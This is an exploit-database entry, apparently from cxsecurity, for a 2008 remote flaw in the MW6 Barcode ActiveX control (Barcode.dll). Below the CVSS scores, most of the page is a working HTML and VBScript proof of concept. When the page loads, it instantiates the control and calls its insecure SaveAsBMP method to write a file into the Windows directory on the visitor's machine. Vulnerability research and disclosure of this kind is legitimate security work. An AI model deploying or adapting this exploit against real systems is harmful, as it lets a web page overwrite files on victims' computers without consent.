MW6 Barcode ActiveX (Barcode.dll) Insecure Method Exploit

2008-11-06 / 2008-11-07
Credit: Dr.Pantagon
Risk: High
Local: No
Remote: Yes


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

&#239;&#187;&#191;<!-- By Dr.Pantagon DeltaSecurityCenter www.DeltaSecurity.ir Description : 1D Barcode ActiveX ver : 3.0.0.1 CopyRight : MW6 Technologies, Inc. Download Link : http://www.mw6tech.com/barcode/try/MW6Barcode.zip This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6 This control contains two methods SaveAsBMP(); And SaveAsWMF(); Sub SaveAsWMF ( ByVal FileName As String ) AND Sub SaveAsWMF ( ByVal FileName As String ) you can see this problem to all product this company --> <html> <object classid='clsid:14D09688-CFA7-11D5-995A-005004CE563B' id='target' > <param name="BackColor" value="16777215"> <param name="BarHeight" value="1,5"> <param name="BarColor" value="0"> <param name="BorderStyle" value="0"> <param name="CheckDigit" value="0"> <param name="CheckDigitToText" value="0"> <param name="CodaBarStartChar" value="65"> <param name="CodaBarStopChar" value="66"> <param name="Data" value="1234"> <param name="NarrowBarWidth" value="0,07"> <param name="Orientation" value="0"> <param name="ShowText" value="1"> <param name="Supplement" value=""> <param name="SupplementGap" value="0,5"> <param name="SupplementType" value="0"> <param name="SymbologyType" value="2"> <param name="UPCESystem" value="0"> <param name="Wide2NarrowRatio" value="2"> <param name="FontName" value="Arial"> <param name="FontItalic" value="0"> <param name="FontStrikeOut" value="0"> <param name="FontUnderline" value="0"> <param name="FontWeight" value="400"> <param name="FontHeight" value="24"> </object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\Barcode.dll" prototype = "Sub SaveAsBMP ( ByVal FileName As String )" memberName = "SaveAsBMP" progid = "BARCODELib.MW6Barcode" argCount = 1 arg1="c:\windows\system_.ini" target.SaveAsBMP arg1 'target.SaveAsWMF arg1 </script>

References:

http://www.milw0rm.com/exploits/6871
http://secunia.com/advisories/32425


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top